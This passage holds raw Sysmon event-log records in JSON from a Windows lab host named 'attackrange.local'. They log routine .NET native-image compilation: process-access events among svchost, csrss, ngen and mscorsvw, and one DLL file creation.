{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7490,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.163\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2257-5F25-0000-00104CAD0D00}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.163","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2257-5F25-0000-00104CAD0D00}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7491,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.194\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2252-5F25-0000-001009530D00}\r\nTargetProcessId: 3268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.194","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2252-5F25-0000-001009530D00}","TargetProcessId":"3268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7492,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.194\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2252-5F25-0000-001009530D00}\r\nTargetProcessId: 3268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.194","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2252-5F25-0000-001009530D00}","TargetProcessId":"3268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7493,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.210\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2257-5F25-0000-0010D6B00D00}\r\nTargetProcessId: 3268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.210","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2257-5F25-0000-0010D6B00D00}","TargetProcessId":"3268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7494,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:43.257\r\nProcessGuid: {41C8662E-2257-5F25-0000-0010D6B00D00}\r\nProcessId: 3268\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cc4-0\\PresentationFramework-SystemXml.dll\r\nCreationUtcTime: 2020-08-01 08:05:43.257","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:43.257","ProcessGuid":"{41C8662E-2257-5F25-0000-0010D6B00D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cc4-0\\PresentationFramework-SystemXml.dll","CreationUtcTime":"2020-08-01 08:05:43.257","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7495,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.304\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2257-5F25-0000-00109CB50D00}\r\nTargetProcessId: 3980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.304","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2257-5F25-0000-00109CB50D00}","TargetProcessId":"3980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7496,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.304\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2257-5F25-0000-00109CB50D00}\r\nTargetProcessId: 3980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.304","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2257-5F25-0000-00109CB50D00}","TargetProcessId":"3980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7497,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.304\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2257-5F25-0000-00109CB50D00}\r\nTargetProcessId: 3980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.304","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2257-5F25-0000-00109CB50D00}","TargetProcessId":"3980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7498,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.335\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2253-5F25-0000-00101D5A0D00}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 